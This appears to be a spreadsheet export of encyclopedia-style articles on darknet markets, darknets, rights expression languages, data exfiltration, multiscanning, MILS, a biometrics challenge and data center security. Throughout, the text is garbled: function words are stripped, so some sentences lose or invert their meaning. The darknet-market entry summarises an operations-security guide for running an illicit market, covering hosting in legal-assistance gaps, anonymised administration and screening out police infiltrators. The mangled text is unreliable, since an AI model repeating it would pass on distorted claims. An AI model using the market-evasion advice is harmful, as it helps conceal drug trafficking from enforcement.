service attempted automate process setting markets saas solution; however, closed short time later.following repeated problems associated centralized infrastructure, number decentralized marketplace software alternatives using blockchain peer-to-peer technologies, including openbazaar bitmarkets, vendors list market, vendor undergone application process referral, proof reputation another market given cash deposit market.many vendors list wares multiple markets, ensuring retain reputation even single market place close. grams launched "infodesk" allow central content identity management vendors well distribution.meanwhile, individual enforcement operations regularly investigate arrest individual vendors purchasing significant quantities personal use.a february 2016 report suggested quarter purchases resale. products drugs whilst great many products sold, drugs dominate numbers listings, drugs including cannabis, mdma, modafinil, lsd, cocaine, designer drugs. personal information personally identifying information, financial information like credit card bank account information, medical data medical data breaches bought sold, mostly darknet markets also black markets. people increase value stolen data aggregating publicly available data, sell profit, increasing damage done people whose data stolen. fraud hacking services cyber crime hacking services financial institutions banks also offered dark web. markets alphabay market hosted significant share commercial fraud market, featuring carding, counterfeiting many related services. loyalty card information also sold easy launder. prohibitions restrictions many markets refuse list weapons poisons. markets original silk road would refuse list anything "purpose harm defraud, stolen credit cards, assassinations, weapons mass destruction".later markets evolution "child pornography, services related murder/assassination/terrorism, prostitution, ponzi schemes, lotteries", allow wholesaling credit card data.the market firearms appears attract extra attention enforcement, selling weapons certain types knives blades. market operations nachash, former proprietor doxbin, wrote guide early 2015 entitled want darknet drug lord background research tasks included learning past drug lords, researching legal matters, studying enforcement agency tactics obtaining legal representation. with regards prospective market's hosting, recommends identifying hosting country gaps mutual legal assistance treaty one's country residence, avoiding overpriced bulletproof hosting choosing host support accepts suitably hard-to-trace payment. patterns recommended avoid include hiring hitmen like dread pirate roberts, sharing handles software questions sites like stack exchange. advises running secured server operating system server-side transparent proxy server, hardening application configurations, tor-based server administration, automated server configuration management rebuild secure destruction frequent server relocation rather darknet managed hosting service. protect guard node deanonymization recommends obfuscating traffic investing relays market site exclusively use. local machine configuration recommends computer purchased cash running linux, using local transparent proxy. operations security suggests avoiding storing conversation logs, varying writing styles, avoiding mobile phone-based tracking leaking false personal details obfuscate one's identity. recommended. recommends verifying market employees carefully, weed enforcement infiltration barium meal tests. enforcement intelligence agencies expanded investigations dark markets, fraudulent markets large number services pretend legitimate vendor shop, marketplace kind order defraud people. these include notoriously unreliable stores, even fake assassination websites. exit scams centralized market escrow allows market close "exit" buyer's vendor's cryptocurrency time. this happened several occasions blackbank, evolution, wall street market.individual vendors often reach point reputation maturity whereby sold sufficient product reliably gained significant reputation accumulated escrowed funds; many choose exit funds rather compete higher-volume higher-priced matured product level. commentary december 2014, exhibition carmen weisskopf domagoj smoljo entitled "the darknet: from memes onionland" explored darknet culture. this featured called "random darknet shopper" spent $100 week products listed agora. their explore ethical philosophical implications markets, which, despite high-profile internationally co-ordinated raids, persist flourish.james martin's 2014 book drugs dark net: cryptomarkets transforming global trade illicit drugs discusses vendors even branding opium cocaine "fair trade", "organic" sourced conflict-free zones. june 2015 journalist jamie bartlett gave talk state darknet market ecosystem stands today.according 2014 studies martin aldridge décary-hétu january 2015 report global drug policy observatory, many harm reduction trends spotted. these include reduced risks associated street dealing offered hard drugs. vendor feedback system provides accountability risks mixing side effects protection scammers. online forum communities provide information safe drug environment users anonymously questions. some users report online element moderating effect consumption increased lead time ordering sites compared street dealing.professor addiction research heino stöver notes shops seen political statement, advancing drug legalization "from below". results markets higher quality lower prices psychoactive substances well lower risk violent incidents. number studies suggest markets silk road helped users reduce harm caused illicit drug use, particularly compared street-based drug marketplaces. examples include sale high-quality products risk contamination (including lacing cutting), vendor-tested products, sharing trip reports, online discussion harm reduction practices. some health professionals "doctorx" provide information, advice drug-testing services darknet. quality products attributed competition transparency darknet markets involve user feedback reputation features. europol reported december 2014, lately seen large amount physical crime move online, least 'marketing' delivery part business [buyers can] illegal commodity delivered risk-free place choice mailman courier, maybe drone future, virtual currency full anonymity, without police able identify either buyer seller."in june 2015 european monitoring centre drugs drug addiction (emcdda) produced report citing difficulties controlling virtual market places darknet markets, social media mobile apps. august 2015 announced interpol offers dedicated dark training program featuring technical information cybersecurity simulated darknet market takedowns. october 2015 uk's national crime agency gchq announced formation "joint operations cell" focus cybercrime. november 2015 team would tasked tackling child exploitation dark well cybercrime.in february 2015, emcdda produced another report citing increased importance customer service reputation management marketplace, reduced risk violence increased product purity. estimated quarter purchases resale trend towards decentralization meant unlikely eliminated time soon.a june 2016 report global drug survey described markets increasing popularity, despite ongoing enforcement action scams. other findings include consumers making purchases friends operating browser bitcoin payments, rather directly. access markets respondents' cases users trying type drug. size listings size darknet markets economy problematic estimate. study based combination listing scrapes feedback estimate sales volume researchers carnegie mellon university captured best data. reviewed 2013 analysis silk road grossing $300,000 day, extrapolating $100 million year. subsequent data later markets significant gaps well complexities associated analysing multiple marketplaces. 18,174 october 2013, digital citizens alliance, 13,472 silk road november 2013 41,207 april 2014 digital citizens alliance 33,985 2014 guardian reddit 43,175 july 2014 report 65,595 august 2014 digital citizens alliance 51,755 december 2014 digital citizens alliance 68,835 march 2015 (before evolution scam), digital citizens alliance 68,322 april 2015 (after evolution scam)digital citizens alliance fiction episode "eps2.3_logic-b0mb.hc" (ep. season drama–thriller television series, robot, protagonist, elliot, supposed repairing hidden site turns darknet market called "midland city" styled silk road sale guns, trafficked women, rocket launchers, drugs hitmen hire.in 2016 movie nerve starring emma roberts dave franco, dark plays major role. grand theft auto online, players purchase warehouses garages illicit cargo stolen cars buy/steal sell trade "securoserv" syndicate website. after biker dlc, players purchase buildings illegal drugs counterfeit products manufacture, distribute darknet website called "the open road" enforcement cannot notified player's trade. first lupin third part anime series, arsène lupin steals digital currency "marco polo" darknet market. also black market carding (fraud) crime forum cyber-arms industry deep (film) drug liberalization illegal drug trade list hidden services references</t>
  </si>
  <si>
    <t>Darknet</t>
  </si>
  <si>
    <t>dark darknet overlay network within internet accessed specific software, configurations, authorization, often uses unique customized communication protocol. typical darknet types social networks (usually used file hosting peer-to-peer connection), anonymity proxy networks anonymized series connections.the term "darknet" popularized major news outlets associate onion services, infamous drug bazaar silk road used despite terminology unofficial. technology tor, i2p, freenet intended defend digital rights providing security, anonymity, censorship resistance used illegal legitimate reasons. anonymous communication whistle-blowers, activists, journalists news organisations also facilitated darknets applications securedrop. terminology term originally described computers arpanet hidden, programmed receive messages respond acknowledge anything, thus remaining invisible, dark. account detailed first online transaction related drugs transpired 1971 students massachusetts institute technology stanford university traded marijuana using arpanet accounts former's artificial intelligence laboratory.since arpanet, usage dark expanded include friend-to-friend networks (usually used file sharing peer-to-peer connection) privacy networks tor. reciprocal term darknet clearnet surface referring content indexable search engines.the term "darknet" often used interchangeably "dark web" quantity hidden services tor's darknet. additionally, term often inaccurately used interchangeably deep tor's history platform could search-indexed. mixing uses terms described inaccurate, commentators recommending terms used distinct fashions. origins "darknet" coined 1970s designate networks isolated arpanet (the government-founded military/academical network evolved internet), security purposes. darknet addresses could receive data arpanet appear network lists would answer pings inquiries. term gained public acceptance following publication "the darknet future content distribution", 2002 paper peter biddle, paul england, marcus peinado, bryan willman, four employees microsoft argued presence darknet primary hindrance development workable digital rights management (drm) technologies made copyright infringement inevitable. this paper described "darknet" generally type parallel network encrypted requires specific protocol allow user connect sub-cultures journalist lasica, 2005 book darknet: hollywood's against digital generation, described darknet's reach encompassing file sharing networks. subsequently, 2014, journalist jamie bartlett book dark used term describe range underground emergent subcultures, including camgirls, cryptoanarchists, darknet drug markets, self harm communities, social media racists, transhumanists. uses darknets general used various reasons, better protect privacy rights citizens targeted mass surveillance computer crime (cracking, file corruption, etc.) protecting dissidents political reprisal file sharing (warez, personal files, pornography, confidential files, illegal counterfeit software, etc.) sale restricted goods darknet markets whistleblowing news leaks purchase sale illicit illegal goods services circumventing network censorship content-filtering systems, bypassing restrictive firewall policies software darknets require specific software installed network configurations made access them, tor, accessed customized browser vidalia (aka browser bundle), alternatively proxy configured perform function. active popular instance darknet, often mistakenly equated darknet general. alphabetical list: anonet decentralized friend-to-friend network built using software routers. bittorrent high performance semi-decentralized peer-to-peer communication protocol. decentralized network (not anonymity research purposes). freenet popular file hosting darknet platform. supports friend-to-friend opennet modes. gnunet utilized darknet "f2f (network) topology" option enabled. (invisible internet project) overlay proxy network features hidden services called "eepsites". ipfs browser extension backup popular webpages. retroshare friend-to-friend messenger communication file transfer platform. used darknet discovery features disabled. riffle government, client-server darknet system simultaneously provides secure anonymity long least server remains uncompromised), efficient computation, minimal bandwidth burden. secure scuttlebutt peer-to peer communication protocol, mesh network, self-hosted social media ecosystem syndie software used publish distributed forums anonymous networks i2p, freenet. (the onion router) anonymity network also features darknet onion services. tribler anonymous bittorrent client built search engine, non-web, worldwide publishing channels. urbit federated system personal servers peer-to-peer overlay network. zeronet hosting users. longer supported stealthnet (discontinued) waste defunct allpeers turtle also references media related darknet wikimedia commons</t>
  </si>
  <si>
    <t>Darknetlive</t>
  </si>
  <si>
    <t>darknetlive news information site covering darknet markets dark activities. regular topics include major drug dealer 'vendor' arrests, kinds information surrounding darknet market activities closures.a part blueleaks hack, document mentions non-commercial sites darknetlive "legal gateways" accessing darknet markets. external links official website references</t>
  </si>
  <si>
    <t>Rights Expression Language</t>
  </si>
  <si>
    <t>rights expression language machine-processable language used express intellectual property rights (such copyright) terms conditions content. rels used standalone expressions (i.e. metadata usable search, compatibility tracking) within system. rels expressible machine-language (such xml, schema, json). although rels processed directly, also encountered embedded metadata within documents, ebooks, image, audio video files. notable rels notable rels include: ccrel schema used creative commons project express licences. this vocabulary also adopted project express general public license (gpl) machine-readable form.w3c open digital rights language odrl permissions obligations expression (poe) working group developed odrl recommendations expressing permissions obligations statements digital content. odrl information model offers framework underlying concepts, entities, relationships form foundational basis semantics odrl expressions. odrl information model support flexible policy expressions allowing author include much, little, expressive detail terms conditions asset usage, parties involved, obligations. odrl vocabulary expression describes potential terms used odrl policy expressions serialise them. terms form part odrl ontology formalise semantics. wide terms vocabulary provides support communities odrl primary language express common cases.xrml xrml began work xerox 1990s. after passing several versions separate projects, later formed basis mpeg-21.mpeg-21 part mpeg standard includes rel.metsrights metsrights extension schema mets packaging metadata standard. function define licences, describe licences terms permissions restrictions imply related content used. "licence" mean either: "well-known licence", gfdl, apache license creative commons cc-by-sa-3.0 etc. pre-defined licence like these, well known. examples would proprietary "shrinkwrap" licences. specific licence created individual terms conditions, content licensed party another. well-known licences well-known licence often chosen unambiguous simplicity: gfdl means matter using using existing licences also avoids problems licence proliferation. also practical licence, check project complying without understanding much detail entails. merely knowing "gfdl acceptable project" "all resources within project gfdl" sufficient. sense, well-known licences avoid needing model details licence, name alone enough.despite this, still useful licences. provides machine-processable identify licence use, avoiding naming issues potential ambiguities "apache license" "apache licence". authors licences also require means describe internal details. pre-defined licence these similar well-known licences, they're defined applied many instances licensing. their difference they're well known, also necessary explain entails, user always likely encountering first time. provides means this. using licensed content within project requires evaluation statement, "are resources within project whose licence forbids condition project requires, requires condition project cannot permit?". these might include necessary ability distribute copies project afterwards, condition accreditation splash screen might unacceptable projects. open source software development, also common projects create licence project name, details licence boilerplate copy well-known licence, even reference licence. support this, providing means licences defined sub-classing existing licences possibly changing behaviour. many licences little vanity licences, although dependent projects must still able work them. specific licences these licences created needed, specific pieces content, specific users. this usually use-specific conditions attached them, expiry dates. although licences might based standard boilerplate, thus unique. referring name could work there's single, stable name. it's thus necessary express terms individual properties. examples might include time-limited contract watch sport month, paid ongoing contract, watch within home show within public bar. structure conveniently entity-attribute-value model, rdf, structure description rights model. such model expresses lists entities concrete "things" "classes", e.g.:work/assetthe item licensed.licencethe licence, particularly either "well-known" licence (where many works comparable abstract licence, gfdl) else instance specific licence, content playback rights purchased user.end-user/partiesa means identify end-user, licensing specific contract person body, well licensing party.jurisdictionrarely stated explicitly, important qualifier local legal variations law.attributes "properties", aspects entities, e.g. licence:constraintsactions either permitted, forbiddensome rels separate constraints groups, likely values generally disjoint sets (actions sometimes prohibited rarely compulsory)permissions prohibitions requirements/obligations duties)values values properties, pre-defined vocabulary, e.g. four freedoms:using work studying modifying work redistributing copies redistributing modified copies print assetthe defines sets members three groups, permitted relations them. example concepts licences, permissions redistributing copies. also relations, licence express prohibitions, separately permission given redistribute copies. statements made using (these would outside itself) this defines abstract licence, permits re-distribution copies. works licence referring note although hypothetical "distribution permitted" licence expressed using creative commons rel, creative commons licence. merely uses concepts "license", "permission" "distribution". although creative commons licences defined project, share exact commonality terms: "distribution" exactly meaning legal definition them. odrl example shows agreement (license) assigner party asset displayed assignee (user), another print asset. interworking licences increasing interest mashups collaborative projects creates demand combining content, licensing technologies support this. simplest approach combine content well-known licence. this over-restrictive though, many compatible licences permit content combined. however difficult judge this, whether permitted resultant content licensed. there still subtleties overlapping requirements copyleft issues. notably creative commons 'attribution-sharealike' 'attribution-noncommercial-sharealike' incompatible.combining licences simpler licences involved expressed rel. case easier permission prohibition applies least apply identical definition "distribution". obvious example creative commons licenses, family licences defined terms rel. even different licences originally defined different rel, possible re-encode licence simultaneously another shared rel, making comparable. recently expressed ccrel, giving advantage. difficulties interworking licences apart issues conflicting requirements (above), also technical issues comparing licences. many alleviated used, even licences different. semantics regular problem semantic translation schemas (such rels) making sure meanings terms identical. although semantic beginning ontology tools describe meaning, current state less advanced this. simpler processing, potential expensive litigation otherwise, means semantics rels must clearly identical, inferred reasoner. regular problems demonstrating equivalence classes, properties instances. rels major problem instances, i.e. precise definitions "distribution", "share-alike" etc. classes properties usually simple concepts similar. rels support classes though: ignore jurisdiction even end-user, according needs market developed for. implicit pre-conditions less-obvious problem comparing rels differing baseline. baseline defines conditions implied licence explicit statements included. some rels take "everything permitted forbidden" approach, others (such ccrel) berne convention baseline. references</t>
  </si>
  <si>
    <t>Data exfiltration</t>
  </si>
  <si>
    <t>data exfiltration occurs malware and/or malicious actor carries unauthorized data transfer computer. also commonly called data extrusion data exportation. data exfiltration also considered form data theft. since year 2000, number data exfiltration efforts severely damaged consumer confidence, corporate valuation, intellectual property businesses national security governments across world. types exfiltrated data data exfiltration scenarios, large amount aggregated data exfiltrated. however, scenarios, likely certain types data targeted. types data targeted includes: usernames, associated passwords, system authentication related information information associated strategic decisions cryptographic keys personal financial information social security numbers personally identifiable information (pii) mailing addresses united states national security agency hacking tools techniques several techniques used malicious actors carry data exfiltration. technique chosen depends number factors. attacker easily gain physical privileged remote access server containing data wish exfiltrate, chances success much better otherwise. example, would relatively easy system administrator plant, turn, execute malware transmits data external command control server without getting caught. similarly, gain physical administrative access, potentially steal server holding target data, realistically, transfer data server flash drive. many cases, malicious actors cannot gain physical access physical systems holding target data. situations, compromise user accounts remote access applications using manufacturer default weak passwords. 2009, analyzing data exfiltration attacks took place countries, spiderlabs discovered ninety percent success rate compromising user accounts remote access applications without requiring brute-force attacks. once malicious actor gains level access, transfer target data elsewhere.additionally, sophisticated forms data exfiltration. various techniques used conceal detection network defenses. example, cross site scripting (xss) used exploit vulnerabilities applications provide malicious actor sensitive data. timing channel also used send data packets time specified intervals even difficult network defenses detect prevent. preventive measures number things done help defend network data exfiltration. three main categories preventive measures effective: preventive detective investigativeone example detective measures implement intrusion detection prevention systems regularly monitor network services ensure known acceptable services running given time. suspicious network services running, investigate take appropriate measures immediately. preventive measures include implementation maintenance access controls, deception techniques, encryption data process, transit, rest. investigative measures include various forensics actions counter intelligence operations. references external sources http://www.ists.dartmouth.edu/library/293.pdf https://www.scmagazine.com/data-exfiltration-defense/article/536744/ data exfiltration blogs, news reports</t>
  </si>
  <si>
    <t>Multiscanning</t>
  </si>
  <si>
    <t>multiscanning running multiple anti-malware antivirus engines concurrently. traditionally, single engine actively scan system given time. using multiple engines simultaneously result conflicts lead system freezes application failures. however, number security applications application suites optimized multiple engines work together. reason testing agencies published results showing single antivirus engine 100% effective every malware threat. because engine uses different scanning methodologies updates malware definition files various frequencies, using multiple engines increases likelihood catching malware affect system network. notable vendors f-secure combines in-house engine avira's engine. data antivirus combines in-house bitdefender's engines. avast removed version 2014. hitmanpro combines in-house behavioral engine cloud containing engines kaspersky lab, bitdefender sophos. lavasoft ad-aware combines in-house anti-spyware engine bitdefender's engine. microsoft forefront combines engines authentium, kaspersky, norman virusbuster, in-house engine. opswat metadefender cloud combines anti-malware engines scan files malware. also available on-premise. qihoo internet security bitdefender engine, engine, cloud engine. but, chinese version includes avira engine additionally. trustport antivirus combines engines bitdefender avg. also comparison antivirus software comparison firewalls internet security references</t>
  </si>
  <si>
    <t>Data Security Council of India</t>
  </si>
  <si>
    <t>data security council india (dsci) premier industry body data protection india, setup nasscom®, committed making cyberspace safe, secure trusted establishing best practices, standards initiatives cyber security privacy. dsci brings together national governments, agencies, industry sectors including it-bpm, bfsi, telecom, industry associations, data protection authorities think tanks public advocacy, thought leadership, capacity building outreach initiatives.dsci engages governments, regulators, industry associations think tanks policy matters. strengthen thought leadership cyber security privacy, dsci develops best practices frameworks, publishes studies, surveys papers. builds capacity security, privacy cyber forensics training certification program professionals enforcement agencies engages stakeholders various outreach initiatives including events, awards, chapters, consultations membership programs. dsci also endeavors increase india’s share global security product services market global trade development initiatives. these strengthen security privacy culture india. certifications frameworks external links official website</t>
  </si>
  <si>
    <t>Data architect</t>
  </si>
  <si>
    <t>data architect practitioner data architecture, data management discipline concerned designing, creating, deploying managing organization's data architecture. data architects define data stored, consumed, integrated managed different data entities systems, well applications using processing data way. closely allied business architecture considered four domains enterprise architecture. role according data management body knowledge, data architect “provides standard common business vocabulary, expresses strategic data requirements, outlines high level integrated designs meet requirements, aligns enterprise strategy related business architecture.” according open group architecture framework (togaf), data architect expected data architecture principles, create models data enable implementation intended business architecture, create diagrams showing data entities, create inventory data needed implement architecture vision. responsibilities organizes data macro level. organizes data micro level, data models, application. provides logical data model standard golden source consuming applications inherit. provides logical data model elements business rules needed creation data quality (dq) rules. skills lambert describes necessary skills data architect follows: foundation systems development: data architect understand system development life cycle; software project management approaches; requirements, design, test techniques. data architect asked conceptualize influence application interface projects, therefore must understand advice give plug steer toward desirable outcomes. depth data modeling database design: this core skill data architect, requested data architect descriptions. effective data architect sound across phases data modeling, conceptualization database optimization. his/her experience skill extends development perhaps database administration. breadth established emerging data technologies: addition depth established data management reporting technologies, data architect either experienced conversant emerging tools like columnar nosql databases, predictive analytics, data visualization, unstructured data. while necessarily deep technologies, data architect hopefully experienced more, must understand sufficiently guide organization understanding adopting them. ability conceive portray "big picture": when data architect initiates, evaluates, influences projects perspective entire organization. data architect maps systems interfaces used manage data, sets standards data management, analyzes current state conceives desired future state, conceives projects needed close current state future goals. ability astutely operate organization: five characteristics, point data architect’s ability operate politically organization: well respected influential able emphasize methodology, modeling, governance technologically politically neutral articulate, persuasive, good salesperson enthusiastic also data architecture information architect enterprise architecture references</t>
  </si>
  <si>
    <t>Multiple Independent Levels of Security</t>
  </si>
  <si>
    <t>multiple independent levels security/safety (mils) high-assurance security architecture based concepts separation controlled information flow. implemented separation mechanisms support untrusted trustworthy components; ensuring total security solution non-bypassable, evaluatable, always invoked, tamperproof. overview mils solution allows independent evaluation security components trusted composition. mils builds older bell padula theories secure systems represent foundational theories orange book. mils system employs separation mechanisms (e.g., separation kernel, partitioning communication system, physical separation) maintain assured data process separation. mils system supports enforcement application/system specific security policies authorizing information flow components security domain trustworthy security monitors (e.g., access control guards, downgraders, crypto devices, etc.). neat properties: non-bypassable: component another communication path, including lower level mechanisms bypass security monitor. evaluatable: trusted component evaluated level assurance required component. this means components modular, well designed, well specified, well implemented, small, complexity, etc. always-invoked: every access/message checked appropriate security monitors (i.e., security monitor check first access pass subsequent accesses/messages through). tamperproof: system controls "modify" rights security monitor code, configuration data; preventing unauthorized changes.a convenient acronym characteristics neat. trustworthiness 'trustworthy' means component certified satisfy well defined security policies level assurance commensurate level risk component (e.g., single level access control guards evaluated eal4; separation mechanisms evaluated high robustness; two-level separation guards type crypto mils system). 'untrusted' means confidence system meets specification respect security policy. companies following companies mils separation kernel products: green hills software lynuxworks sysgo wind river systems bertin technologies labscompanies separation methods creating mils products: thales mils research technology mils communitythe mils community global international, open membership, not-for-profit competence network mils architecture technologies.research projectseuro-mils: secure european virtualisation trustworthy applications critical domains d-mils: distributed mils dependable information communication infrastructures [3]. certmils: compositional security certification medium- high-assurance cots-based systems environments emerging threats also multiple levels security secure design references rushby, 2008. separation integration mils (the mils constitution). technical report sri-csl-08-xx, international.</t>
  </si>
  <si>
    <t>Multiple Biometric Grand Challenge</t>
  </si>
  <si>
    <t>multiple biometric grand challenge (mbgc) biometric project. primary goal improve performance face iris recognition technology still video imagery series challenge problems evaluation. background over last decade, numerous government industry organizations moved moving toward deploying automated biometric technologies provide increased security systems facilities. u.s. government organizations recently sponsored face recognition grand challenge (frgc), face recognition vendor test (frvt) 2006 iris challenge evaluation (ice) 2006. results frgc frvt 2006 documented orders magnitude improvement performance face recognition full-frontal, controlled conditions last years. first time, 2006 provided independent assessment multiple iris recognition algorithms data set. however, advances technologies needed meet full range operational requirements. many requirements focus biometric samples taken less ideal conditions, example: quality still images high quality video imagery face iris images taken varying illumination conditions off-angle occluded imagesbuilding challenge problem evaluation paradigm frgc, frvt 2006, 2005 2006, multiple biometric grand challenge (mbgc) address problem areas. overview primary goal mbgc investigate, test improve performance face iris recognition technology still video imagery series challenge problems evaluation. mbgc seeks reach goal several technology development areas: face recognition still frontal, real-world-like high resolution imagery iris recognition video sequences off-angle images fusion face iris score image levels) unconstrained face recognition still video recognition near infrared (nir) high definition (hd) video streams taken portalsthe mbgc consist challenge problems designed advance current state technology conclude planned independent evaluation. challenge problems focus three major areas: iris face recognition portal video: goal develop algorithms recognize people near infrared image sequences high definition video sequences. sequences acquired people walk portal. iris face recognition controlled images: goal improve performance iris face imagery. face data real-world-like high resolution images frontal faces. iris images consist still video iris sequences. still video face: goal advance recognition unconstrained outdoor video sequences still images.these challenge problems allow fusion face iris score level image level. challenge problem structure overview multiple biometric grand challenge based previous challenges directed jonathon phillips. specifically facial recognition grand challenge (frgc) iris challenge evaluation (ice 2005). programmatic process challenge problem follows. challenge team designs protocols, challenge problems, prepares challenge infrastructure, composes necessary data sets. organizations sign licenses receive data begin develop technology (mostly computer algorithms) attempt solve various challenges laid challenge team. advance inform various participants interested parties team hosts workshops. first workshop gives overview challenge introduces first challenge problems (typically referred version data sets released participating organizations develop algorithms submit self reported results back challenge team form similarity matrices. team analyzes results hosts another workshop. workshop challenge team reports results challenge version releases challenge version cycle repeated, finishing final workshop. stage participants requested submit self reported results, actual executables sdks) algorithms. challenge team runs algorithms battery tests large sequestered datasets. this phase ultimately determines performance levels participant’s algorithms. final report issued team used industries governments determine actual state given field provide participating organizations basis showing performance within field. mbgc challenge version multiple biometric challenge version released april 2008. this initial challenge problems following goals. familiarize community problem data. introduce participants challenge protocol experiment environment. grow research community works problems. characterization state art.the version series separated three distinct areas various experiments areas. portal challenge still iris versus near infrared (nir) video iris versus near infrared (nir) still face versus high definition (hd) video multiple biometrics (fusion) still face still iris versus near infrared (nir) high definition (hd) video still face video iris versus near infrared (nir) high definition (hd) videoversion results submitted november 2008, reported mbgc workshop december 2008. mbgc challenge version will released january 2009. submitted results reported mbgc workshop spring 2009. multiple biometric evaluation (mbe) multiple biometric evaluation (mbe) begin summer 2009. purpose conduct independent evaluation mbgc submissions large sequestered data sets. sponsors intelligence advanced research projects agency (iarpa) biometrics task force (btf) department homeland security (dhs) criminal justice information services division technical support working group (tswg) references this article incorporates public domain material national institute standards technology document: "nist multiple biometric grand challenge". footnotes external links mbgc website mbgc blog frgc website frvt website website national institute standards technology intelligence advanced research projects agency department homeland security technical support working group (tswg)</t>
  </si>
  <si>
    <t>Data center security</t>
  </si>
  <si>
    <t>data center security policies, precautions practices adopted data center avoid unauthorized access manipulation resources. data center houses enterprise applications data, hence providing proper security system critical. denial service (dos), theft confidential information, data alteration, data loss common security problems afflicting data center environments.data security issues harmful many companies sometimes, important know issues find useful solutions them. purpose data security protect digital information unauthorized access. also important note data security different data privacy. there many situations data center security would threatened especially cloud-based data. overview according cost data breach survey, u.s. companies different industry sectors participated, noticed that: companies negligence primary cause data breaches malicious criminal attacks account percent total breaches. average cost breach $5.5 million.many companies nowadays using cloud store customers' data, risks saving data cloud enormous. cyber attacks harmful many companies. there companies worldwide troubles cyber attacks year 2020 alone. some cyber attacks targeted personal information identity theft hurt someone's credits life-changing influences. need secure data center physical security needed protect value hardware therein. data protection cost breach security severe consequences company managing data center customers whose data copied. 2012 breach global payments, processing vendor visa, million credit card numbers stolen, highlights risks storing managing valuable confidential data. result, global payments' partnership visa terminated; estimated lost $100 million. insider attacks defenses exploitable software vulnerabilities often built assumption "insiders" trusted. studies show internal attacks tend damaging variety amount information available inside organizations. vulnerabilities common attacks quantity data stored data centers increased, partly concentrations created cloud-computing threats some common threats data centers: (denial service) data theft alteration unauthorized computing resources identity theft vulnerabilities common vulnerabilities include: implementation: software design protocol flaws, coding errors, incomplete testing configuration: defaults, elements inappropriately configured exploitation out-of-date software many "worm" attacks data centers exploited well-known vulnerabilities: codered nimda slammer exploitation software defaults many systems shipped default accounts passwords, exploited unauthorized access theft information. common attacks common attacks include: scanning probing: example probe- scan-based attack port scan whereby "requests range server port addresses host" used, find active port" cause harm known vulnerability service.". this reconnaissance activity often precedes attack; goal gain access discovering information system network. (denial service): denial-of-service attack occurs legitimate users unable access information systems, devices, network resources actions malicious cyber threat actor. this type attack generates large volume data deliberately consume limited resources bandwidth, cycles, memory blocks. distributed denial service (ddos): this kind attack particular case large number systems compromised used source traffic synchronized attack. kind attack, hacker address thousands them. unauthorized access: when someone account owner uses privileges associated compromised account access restricted resources using valid account backdoor. eavesdropping: etymologically, eavesdropping means secretly listen conversation. networking field, unauthorized interception information (usernames, passwords) travels network. user logons common signals sought. viruses worms: these malicious code that, executed produce undesired results. worms self-replicating malware, whereas viruses, also replicate, need kind human action cause damage. internet infrastructure attacks: this kind attack targets critical components internet infrastructure rather individual systems networks. trust exploitation: these attacks exploit trust relationships computer systems communicate. session hijacking also known cookie hijacking: consists stealing legitimate session established target trusted host. attacker intercepts session makes target believe communicating trusted host. buffer overflow attacks: when program allocates memory buffer space beyond reserved, results memory corruption affecting data stored memory areas overflowed. layer attacks: this type attack exploit vulnerabilities data link layer protocols implementations layer switching platforms. injection: also known code injection, input data-entry form's, incomplete data validation, allows entering harmful input causes harmful instructions executed. network security infrastructure network security infrastructure includes security tools used data centers enforce security policies. tools include packet-filtering technologies acls, firewalls intrusion detection systems (idss) network-based host-based. acls (access control list) acls filtering mechanisms explicitly defined based packet header information permit deny traffic specific interfaces. acls used multiple locations within data center internet edge intranet server farm. following describes standard extended access lists: standard acls: simplest type filtering traffic solely based source addresses. standard acls typically deployed control access network devices network management remote access. example, configure standard router specify systems allowed telnet standard acls recommended option traffic filtering lack granularity. standard aclss configured number cisco routers. extended acls: extended filtering decisions based source destination addresses, layer protocols, layer ports, icmp message type code, type service, precedence. cisco routers, define extended acls name number range. firewalls firewall sophisticated filtering device separates segments, giving segment different security level establishing security perimeter controls traffic flow segments. firewalls commonly deployed internet edge boundary internal networks. they expected following characteristics: performance: main goal firewall separate secured unsecured areas network. firewalls post primary traffic path potentially exposed large volumes data. hence, performance becomes natural design factor ensure firewall meets particular requirements. application support: another important aspect ability firewall control protect particular application protocol, telnet, ftp, http. firewall expected understand application-level packet exchanges determine whether packets follow application behavior and, not, deny traffic. there different types firewalls based packet-processing capabilities awareness application-level information: packet-filtering firewalls proxy firewalls stateful firewalls hybrid firewalls idss idss real-time systems detect intruders suspicious activities report monitoring system. they configured block mitigate intrusions progress eventually immunize systems future attacks. they fundamental components: sensors: appliances software agents analyze traffic network resource usage systems identify intrusions suspicious activities. management: single- multi-device system used configure administer sensors additionally collect alarm information generated sensors. sensors equivalent surveillance tools, management control center watching information produced surveillance tools. layer security cisco layer switches provide tools prevent common layer attacks (scanning probing, dos, ddos, etc.). following security features covered layer security: port security inspection private vlans private vlans firewalls security measures process securing data center requires comprehensive system-analysis approach ongoing process improves security levels data center evolves. data center constantly evolving applications services become available. attacks becoming sophisticated frequent. these trends require steady evaluation security readiness. component security-readiness evaluation policies govern application security network including data center. application includes design best practices implementation details. result, security often considered component main infrastructure requirement. since responsibility data centers make sure availability services, data center management systems often consider security affects traffic flows, failures, scalability. fact security measures vary depending data center design, unique features, compliance requirements company's business goals, specific measures cover possible scenarios.there exist general types data center security: physical security virtual security. physical security physical security data center protocol built-in within data center facilities order prevent physical damage machines storing data. those protocols able handle everything ranging natural disasters corporate espionage terrorist attacks. prevent physical attacks, data centers techniques cctv security network: locations access points 90-day video retention. 24×7 on-site security guards, network operations center (noc) services technical team anti-tailgating/anti-pass-back turnstile gate. only permits person pass authentication. single entry point co-location facility. minimization traffic dedicated data halls, suites, cages. further access restriction private cages three-factor authentication ssae compliant facilities. checking provenance design hardware reducing insider risk monitoring activities keeping credentials safe monitoring temperature humidity fire prevention zoned dry-pipe sprinkler natural disaster risk-free locations virtual security virtual security security measures place data centers prevent remote unauthorized access affect integrity, availability confidentiality data stored servers.virtual network security hard task handle exist many ways could attacked. worst part evolving years years. instance, attacker could decide malware similar exploits) order bypass various firewalls access data. systems well security risk contain modern methods data security.virtual attacks prevented techniques heavy data encryption transfer not: 256-bit encryption applications.1024-bit public keys data transfers. 256-bit encryption files databases. logs auditing activities users. secured usernames passwords: encrypted 256-bit ssl, requirements complex passwords, scheduled expirations, prevention password reuse. access based level clearance. ad/ldap integration. control based addresses. encryption session cookies order identify unique user. two-factor authentication availability. third party penetration testing performed annually malware prevention firewalls automated scanner company security some possible strategies upgrade data security company: determine risks. find tools store data computers databases, make sure everything stored compliant manner. review current data security systems. check updates current data security system one. sometimes, stale data removed also helpful cleanup software installed help company delete unused unneeded data. gather data security team. build professional internal security team help company secure data save money hiring security teams. security team must recovery plan case something unexpected happen. update data security approach. make sure authorized people access system. encryption software needed protect data people decrypt system. proper provided, software make data seem useless people. data masking software another software helpful 